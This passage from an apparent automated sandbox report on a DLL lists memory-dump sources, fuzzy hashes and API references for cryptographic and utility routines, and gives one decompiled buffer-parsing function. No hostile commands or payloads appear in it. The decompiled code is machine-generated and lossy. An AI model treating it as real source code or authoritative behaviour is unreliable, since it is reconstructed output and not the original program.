                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_mallocz$mv_calloc
                                                                      • String ID:
                                                                      • API String ID: 1417229449-0
                                                                      • Opcode ID: 243904e0db8cc817c6db168582f6408dcccfb0ebab956b463a2e77faa3b9a132
                                                                      • Instruction ID: 852a126e1f502dc2a5b99aeb69476376aef21eb3025c4fc6af9fe8b8a21a2e70
                                                                      • Opcode Fuzzy Hash: 243904e0db8cc817c6db168582f6408dcccfb0ebab956b463a2e77faa3b9a132
                                                                      • Instruction Fuzzy Hash: CE51D374605B069FC750EFA9D480A1AF7F0FF44780F42892CE9998B601DB74F890CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E10013480() {
                                                                      				int _t125;
                                                                      				void* _t127;
                                                                      				void* _t128;
                                                                      				signed char* _t138;
                                                                      				signed char _t141;
                                                                      				signed int _t143;
                                                                      				void* _t145;
                                                                      				signed char _t148;
                                                                      				signed int _t150;
                                                                      				int _t153;
                                                                      				int _t154;
                                                                      				int _t161;
                                                                      				void _t162;
                                                                      				signed int _t163;
                                                                      				void* _t164;
                                                                      				void _t168;
                                                                      				signed int _t171;
                                                                      				int _t172;
                                                                      				signed int _t175;
                                                                      				int _t176;
                                                                      				signed int* _t177;
                                                                      				int* _t178;
                                                                      				int _t179;
                                                                      				int _t182;
                                                                      				int _t185;
                                                                      				signed int _t193;
                                                                      				signed int _t194;
                                                                      				int _t195;
                                                                      				signed int _t196;
                                                                      				int _t198;
                                                                      				void* _t202;
                                                                      				signed int _t205;
                                                                      				int _t206;
                                                                      				void* _t215;
                                                                      				void* _t218;
                                                                      				void* _t222;
                                                                      				void* _t232;
                                                                      				void* _t233;
                                                                      				void* _t234;
                                                                      				int _t236;
                                                                      				void* _t239;
                                                                      				void* _t240;
                                                                      				signed char* _t246;
                                                                      				signed int _t247;
                                                                      				void _t248;
                                                                      				int* _t249;
                                                                      				int* _t250;
                                                                      
                                                                      				_t177 = _t249[0x1c];
                                                                      				_t125 = _t249[0x1d];
                                                                      				if(_t177 == 0 || _t125 <= 3) {
                                                                      					L36:
                                                                      					_t249[0x12] = 0;
                                                                      					goto L37;
                                                                      				} else {
                                                                      					_t194 =  *_t177;
                                                                      					_t178 =  &(_t177[1]);
                                                                      					_t249[0x11] = 0;
                                                                      					_t127 = _t125 - 4;
                                                                      					asm("bswap edx");
                                                                      					_t249[0x10] = _t194;
                                                                      					if(_t194 != 0 && _t127 > 0xf) {
                                                                      						_t249[0xa] = 0;
                                                                      						_t249[0xb] = 0;
                                                                      						_t249[0x12] = 0;
                                                                      						while(1) {
                                                                      							_t195 =  *_t178;
                                                                      							_t128 = _t127 - 0x10;
                                                                      							_t249[8] = _t128;
                                                                      							_t171 = _t178[2];
                                                                      							_t249[0xc] = _t128;
                                                                      							_t249[0xd] = 0;
                                                                      							asm("bswap edx");
                                                                      							_t249[5] = _t195;
                                                                      							_t196 = _t178[1];
                                                                      							asm("bswap ebx");
                                                                      							asm("bswap edx");
                                                                      							_t249[0xe] = _t196;
                                                                      							_t249[6] = _t196;
                                                                      							_t249[7] = 0;
                                                                      							_t198 = _t178[3];
                                                                      							asm("bswap edx");
                                                                      							_t249[9] = _t198;
                                                                      							asm("adc edi, edx");
                                                                      							asm("adc edi, edx");
                                                                      							asm("sbb eax, edi");
                                                                      							if(_t249[8] < _t195 + _t198 + _t196 * _t171) {
                                                                      								break;
                                                                      							}
                                                                      							_t249[2] = _t171;
                                                                      							_t249[0xc] =  &(_t178[4]);
                                                                      							_t249[3] = _t249[9];
                                                                      							_t249[1] = _t249[0xe];
                                                                      							 *_t249 = _t249[5];
                                                                      							_t138 = E10013100(_t178);
                                                                      							_t202 = _t249[0xc];
                                                                      							_t246 = _t138;
                                                                      							if(_t138 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							if((_t249[0xb] | _t249[0xa]) == 0) {
                                                                      								_t249[0x12] = _t246;
                                                                      							} else {
                                                                      								 *(_t249[0xf] + 0x1c) = _t246;
                                                                      							}
                                                                      							_t179 = _t249[5];
                                                                      							_t232 = _t202;
                                                                      							_t141 =  *_t246;
                                                                      							_t215 = _t141;
                                                                      							if(_t179 >= 8) {
                                                                      								if((_t141 & 0x00000001) != 0) {
                                                                      									_t232 = _t202 + 1;
                                                                      									_t215 = _t215 + 1;
                                                                      									 *_t141 =  *_t202 & 0x000000ff;
                                                                      									_t179 = _t249[5] - 1;
                                                                      								}
                                                                      								if((_t215 & 0x00000002) != 0) {
                                                                      									_t143 =  *_t232 & 0x0000ffff;
                                                                      									_t215 = _t215 + 2;
                                                                      									_t232 = _t232 + 2;
                                                                      									_t179 = _t179 - 2;
                                                                      									 *(_t215 - 2) = _t143;
                                                                      								}
                                                                      								if((_t215 & 0x00000004) != 0) {
                                                                      									_t168 =  *_t232;
                                                                      									_t215 = _t215 + 4;
                                                                      									_t232 = _t232 + 4;
                                                                      									_t179 = _t179 - 4;
                                                                      									 *(_t215 - 4) = _t168;
                                                                      								}
                                                                      							}
                                                                      							memcpy(_t215, _t232, _t179);
                                                                      							_t250 =  &(_t249[3]);
                                                                      							_t145 = _t250[5];
                                                                      							_t233 = _t202 + _t145;
                                                                      							_t250[0xc] = _t233;
                                                                      							_t250[0xf] = _t250[8] - _t145;
                                                                      							if((_t250[0xe] | _t250[7]) == 0) {
                                                                      								L19:
                                                                      								_t172 = _t250[9];
                                                                      								_t148 = _t246[0x14];
                                                                      								_t234 = _t250[0xc];
                                                                      								_t182 = _t172;
                                                                      								_t218 = _t148;
                                                                      								if(_t172 >= 8) {
                                                                      									if((_t148 & 0x00000001) != 0) {
                                                                      										_t205 =  *_t234 & 0x000000ff;
                                                                      										_t234 = _t234 + 1;
                                                                      										_t218 = _t218 + 1;
                                                                      										_t250[5] = _t205;
                                                                      										 *_t148 = _t205;
                                                                      										_t182 = _t250[9] - 1;
                                                                      									}
                                                                      									if((_t218 & 0x00000002) != 0) {
                                                                      										_t150 =  *_t234 & 0x0000ffff;
                                                                      										_t218 = _t218 + 2;
                                                                      										_t234 = _t234 + 2;
                                                                      										_t182 = _t182 - 2;
                                                                      										 *(_t218 - 2) = _t150;
                                                                      									}
                                                                      									if((_t218 & 0x00000004) != 0) {
                                                                      										_t162 =  *_t234;
                                                                      										_t218 = _t218 + 4;
                                                                      										_t234 = _t234 + 4;
                                                                      										_t182 = _t182 - 4;
                                                                      										 *(_t218 - 4) = _t162;
                                                                      									}
                                                                      								}
                                                                      								memcpy(_t218, _t234, _t182);
                                                                      								_t249 =  &(_t250[3]);
                                                                      								_t206 = _t249[9];
                                                                      								_t178 = _t249[0xc] + _t206;
                                                                      								_t127 = _t249[0xf] - _t206;
                                                                      								_t249[0xa] = _t249[0xa] + 1;
                                                                      								asm("adc dword [esp+0x2c], 0x0");
                                                                      								if((_t249[0x11] ^ _t249[0xb] | _t249[0x10] ^ _t249[0xa]) == 0) {
                                                                      									L37:
                                                                      									return _t249[0x12];
                                                                      								} else {
                                                                      									if(_t127 <= 0xf) {
                                                                      										_t153 = _t249[0x12];
                                                                      										if(_t153 == 0) {
                                                                      											goto L36;
                                                                      										}
                                                                      										_t175 = 0;
                                                                      										_t236 = _t153;
                                                                      										if( *((intOrPtr*)(_t153 + 0xc)) == 0) {
                                                                      											L46:
                                                                      											_t154 = _t249[0x12];
                                                                      											_t155 =  *((intOrPtr*)(_t154 + 0x1c));
                                                                      											if( *((intOrPtr*)(_t154 + 0x1c)) != 0) {
                                                                      												L10012850(_t155);
                                                                      											}
                                                                      											_t176 = _t249[0x12];
                                                                      											 *_t249 =  *_t176;
                                                                      											L100290D0();
                                                                      											 *_t249 =  *(_t176 + 8);
                                                                      											L100290D0();
                                                                      											 *_t249 =  *(_t176 + 0x14);
                                                                      											L100290D0();
                                                                      											 *_t249 = _t176;
                                                                      											L100290D0();
                                                                      											goto L36;
                                                                      										}
                                                                      										do {
                                                                      											_t161 =  *( *((intOrPtr*)(_t236 + 8)) + _t175 * 4);
                                                                      											_t175 = _t175 + 1;
                                                                      											 *_t249 = _t161;
                                                                      											L100290D0();
                                                                      										} while (_t175 <  *((intOrPtr*)(_t236 + 0xc)));
                                                                      										goto L46;
                                                                      									}
                                                                      									_t249[0xf] = _t246;
                                                                      									continue;
                                                                      								}
                                                                      							} else {
                                                                      								_t250[5] = _t233;
                                                                      								_t163 = 0;
                                                                      								_t250[8] = _t246;
                                                                      								goto L13;
                                                                      								L13:
                                                                      								_t185 = _t171;
                                                                      								_t222 =  *(_t250[8][8] + _t163 * 4);
                                                                      								_t239 = _t250[5];
                                                                      								if(_t171 >= 8) {
                                                                      									if((_t222 & 0x00000001) != 0) {
                                                                      										_t193 =  *_t239 & 0x000000ff;
                                                                      										_t222 = _t222 + 1;
                                                                      										_t239 = _t239 + 1;
                                                                      										_t250[0x13] = _t193;
                                                                      										 *(_t222 - 1) = _t193;
                                                                      										_t185 = _t171 - 1;
                                                                      									}
                                                                      									if((_t222 & 0x00000002) != 0) {
                                                                      										_t247 =  *_t239 & 0x0000ffff;
                                                                      										_t222 = _t222 + 2;
                                                                      										_t239 = _t239 + 2;
                                                                      										_t185 = _t185 - 2;
                                                                      										 *(_t222 - 2) = _t247;
                                                                      									}
                                                                      									if((_t222 & 0x00000004) != 0) {
                                                                      										_t248 =  *_t239;
                                                                      										_t222 = _t222 + 4;
                                                                      										_t239 = _t239 + 4;
                                                                      										_t185 = _t185 - 4;
                                                                      										 *(_t222 - 4) = _t248;
                                                                      									}
                                                                      								}
                                                                      								_t164 = memcpy(_t222, _t239, _t185);
                                                                      								_t250 =  &(_t250[3]);
                                                                      								_t240 = _t164;
                                                                      								_t250[5] = _t250[5] + _t171;
                                                                      								_t163 = _t164 + 1;
                                                                      								asm("adc edx, 0x0");
                                                                      								if((_t250[7] ^ 0 | _t250[6] ^ _t163) == 0) {
                                                                      									_t246 = _t250[8];
                                                                      									_t250[0xc] = _t250[0xc] + (_t240 + 1) * _t171;
                                                                      									_t250[0xf] = _t250[0xf] - (_t250[0xe] - 1) * _t171 - _t171;
                                                                      									goto L19;
                                                                      								} else {
                                                                      									goto L13;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t133 = _t249[0x12];
                                                                      						if(_t249[0x12] != 0) {
                                                                      							L10012850(_t133);
                                                                      						}
                                                                      					}
                                                                      					goto L36;
                                                                      				}
                                                                      			}
                                                                      0x1001376c
                                                                      0x1001361d
                                                                      0x10013748
                                                                      0x1001374b
                                                                      0x1001374e
                                                                      0x10013751
                                                                      0x10013754
                                                                      0x10013754
                                                                      0x10013629
                                                                      0x1001362b
                                                                      0x1001362d
                                                                      0x10013630
                                                                      0x10013633
                                                                      0x10013636
                                                                      0x10013636
                                                                      0x10013629
                                                                      0x100135d8
                                                                      0x100135d8
                                                                      0x100135da
                                                                      0x100135e4
                                                                      0x100135e8
                                                                      0x100135eb
                                                                      0x100135f4
                                                                      0x1001364c
                                                                      0x10013650
                                                                      0x1001365c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100135f4
                                                                      0x100135bf
                                                                      0x10013774
                                                                      0x1001377a
                                                                      0x1001377c
                                                                      0x1001377c
                                                                      0x1001377a
                                                                      0x00000000
                                                                      0x100134b6

                                                                      APIs
                                                                      • mv_encryption_init_info_alloc.F086 ref: 10013562
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_encryption_init_info_alloc
                                                                      • String ID:
                                                                      • API String ID: 3189372936-0
                                                                      • Opcode ID: c553b2355f7102cf38e75df9346fe31f6216a4e4802c0632ce5a8ed455da1efe
                                                                      • Instruction ID: 5f2a4f4094cb7a0488fc386a39adfcdd6b5e851adb51ea05a95b9a0d2f55e3bd
                                                                      • Opcode Fuzzy Hash: c553b2355f7102cf38e75df9346fe31f6216a4e4802c0632ce5a8ed455da1efe
                                                                      • Instruction Fuzzy Hash: 44B156B1A083418FC764CF29C58461AFBE2FFC8250F56896DE9899B350E631E981CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strlen
                                                                      • String ID: %d.%06d$%d:%02d.%06d$%lld:%02d:%02d.%06d$INT64_MAX$INT64_MIN
                                                                      • API String ID: 39653677-2240581584
                                                                      • Opcode ID: 11cc0387ba0acaa09a76acaf0e1bd6dd28ec28603ad3855deced5f26615f1bcb
                                                                      • Instruction ID: 43d3ff7a82607b78a247297113464a0dd0228f1a79180d729c91701a74fde06b
                                                                      • Opcode Fuzzy Hash: 11cc0387ba0acaa09a76acaf0e1bd6dd28ec28603ad3855deced5f26615f1bcb
                                                                      • Instruction Fuzzy Hash: CBA16C72A187118FC708CF6DD44061EFBE6EBC8750F598A2EF498D7364D674D9058B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f015b48431e7a80715030cee135de255bbf03b7162adfda3c796d469d01474f6
                                                                      • Instruction ID: 80344777319d5c39256bea2cca684abcfe3cba157365ca00e8d05506c74a31d6
                                                                      • Opcode Fuzzy Hash: f015b48431e7a80715030cee135de255bbf03b7162adfda3c796d469d01474f6
                                                                      • Instruction Fuzzy Hash: 54C19E71A087858FD354CF2D888064EBBE1FFC9294F198A2EF8D8C7355E675D9448B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTimeZoneInformation.KERNEL32 ref: 100921A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 565725191-0
                                                                      • Opcode ID: 239ab144a6ce047cfb13d847f2b01901541eb90a974f5925169c811fb4947156
                                                                      • Instruction ID: 7e8eca435f47cc72285f0ff92e2e59cf077fa7250504efb7398187b0f8841556
                                                                      • Opcode Fuzzy Hash: 239ab144a6ce047cfb13d847f2b01901541eb90a974f5925169c811fb4947156
                                                                      • Instruction Fuzzy Hash: FC2139B04093419FDB20EF28D58825ABBF0FF84350F11892DE8D987258E738D584DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_blowfish_crypt_ecb.F086 ref: 10008642
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_blowfish_crypt_ecb
                                                                      • String ID:
                                                                      • API String ID: 997994871-0
                                                                      • Opcode ID: e25778ea9fdb925930b24f7ee5b61e2c5b198a0ae9bacbd401b09897083a4e10
                                                                      • Instruction ID: d8ffb9ab9be6425fb2f2151958634ca33b63df147d529954a2eeef9d18f7c60e
                                                                      • Opcode Fuzzy Hash: e25778ea9fdb925930b24f7ee5b61e2c5b198a0ae9bacbd401b09897083a4e10
                                                                      • Instruction Fuzzy Hash: 537145B19097818BC709CF29D5C846AFBE1FFC9245F118A5EE8DC87344E270AA04CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_mod_i
                                                                      • String ID:
                                                                      • API String ID: 416848386-0
                                                                      • Opcode ID: 3d8ce93c5e70e6cdd39acc70d59f7b57e28878e6643059ac4b681878335ad598
                                                                      • Instruction ID: dd13ca78155645af025b07bce56f249e9a9f1717602db99794a3f06de0c2c3b2
                                                                      • Opcode Fuzzy Hash: 3d8ce93c5e70e6cdd39acc70d59f7b57e28878e6643059ac4b681878335ad598
                                                                      • Instruction Fuzzy Hash: F7420872A083A18BD724CF19D05066FF7E2FFC8750F56891EE9D997390DA70A840DB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_gcd
                                                                      • String ID:
                                                                      • API String ID: 2848192316-0
                                                                      • Opcode ID: 94c61de4151f85b2e349843c83d37783726b6990a1d380f2b046a8bb30d58925
                                                                      • Instruction ID: e6b2b5b070de62496659ab70d0058dc1d8b8705572cd85af2ca405c8e7fadc16
                                                                      • Opcode Fuzzy Hash: 94c61de4151f85b2e349843c83d37783726b6990a1d380f2b046a8bb30d58925
                                                                      • Instruction Fuzzy Hash: 5DF1BF75A083508FC358CF2AC48060AFBE6AFC8750F558A2EF998D7361D670E9458F82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_pix_fmt_desc_get
                                                                      • String ID:
                                                                      • API String ID: 2427544746-0
                                                                      • Opcode ID: 0249601a095a9487cf98e69da83eb75bdd383411e2ebe0cdbe0f724ec450abf0
                                                                      • Instruction ID: 559f6f707dd61799b0b773c6f5cd064c8ce248da486725d9c35fe17e2713b67a
                                                                      • Opcode Fuzzy Hash: 0249601a095a9487cf98e69da83eb75bdd383411e2ebe0cdbe0f724ec450abf0
                                                                      • Instruction Fuzzy Hash: DBA138387083098FD758DE29E4507ABB7E1EF94390F94463EE866CB780EB31E9458B01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_encryption_init_info_alloc.F086 ref: 10013562
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Similarity
                                                                      • API ID: mv_encryption_init_info_alloc
                                                                      • String ID:
                                                                      • API String ID: 3189372936-0
                                                                      • Opcode ID: cd6924afccd7b87e315566fc0b34ac7627ccdbad5b7df46105264a39c2b01be1
                                                                      • Instruction ID: 78d0e82bed4cec982bfd679939fa63163902b3eee1ff480991edcad54221ee49
                                                                      • Opcode Fuzzy Hash: cd6924afccd7b87e315566fc0b34ac7627ccdbad5b7df46105264a39c2b01be1
                                                                      • Instruction Fuzzy Hash: 1951F5B1A087419FC744CF29C58451ABBE2FFC8654F56CA2DF889A7350D731ED458B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: mv_aes_crypt
                                                                      • String ID:
                                                                      • API String ID: 1547198422-0
                                                                      • Opcode ID: a76755bfb4d6463656838ecde433fd04cde547babbb3dbb5163c6ebd5a4d3b10
                                                                      • Instruction ID: 6533aa27bc2eace4d46e94b1d96a72d5c0883edd5f4be066e5c3eb9db2eb8fbd
                                                                      • Opcode Fuzzy Hash: a76755bfb4d6463656838ecde433fd04cde547babbb3dbb5163c6ebd5a4d3b10
                                                                      • Instruction Fuzzy Hash: 81419D3510D7C18FD301CF69848054AFFE1FF99288F198A6DE8D993306D260EA09CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: mv_aes_crypt
                                                                      • String ID:
                                                                      • API String ID: 1547198422-0
                                                                      • Opcode ID: 3928a72eaf0bdf75db777ef61b97453f1547db555a5c878ed5744eb0c7f909a7
                                                                      • Instruction ID: b15eea7d1e62e16a03610dfd725cbd08b0199710858140edd711ee624ae9ea9b
                                                                      • Opcode Fuzzy Hash: 3928a72eaf0bdf75db777ef61b97453f1547db555a5c878ed5744eb0c7f909a7
                                                                      • Instruction Fuzzy Hash: DC31C47610D7C18FD302CB6990C0099FFE1FF99248F198AADE4DD93706D264EA19CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_blowfish_crypt_ecb.F086 ref: 100086C2
                                                                      Similarity
                                                                      • API ID: mv_blowfish_crypt_ecb
                                                                      • String ID:
                                                                      • API String ID: 997994871-0
                                                                      • Opcode ID: acf8950ea6c148c44c64157bc22eca501f0550abc9d144bf7c67352d16790dd9
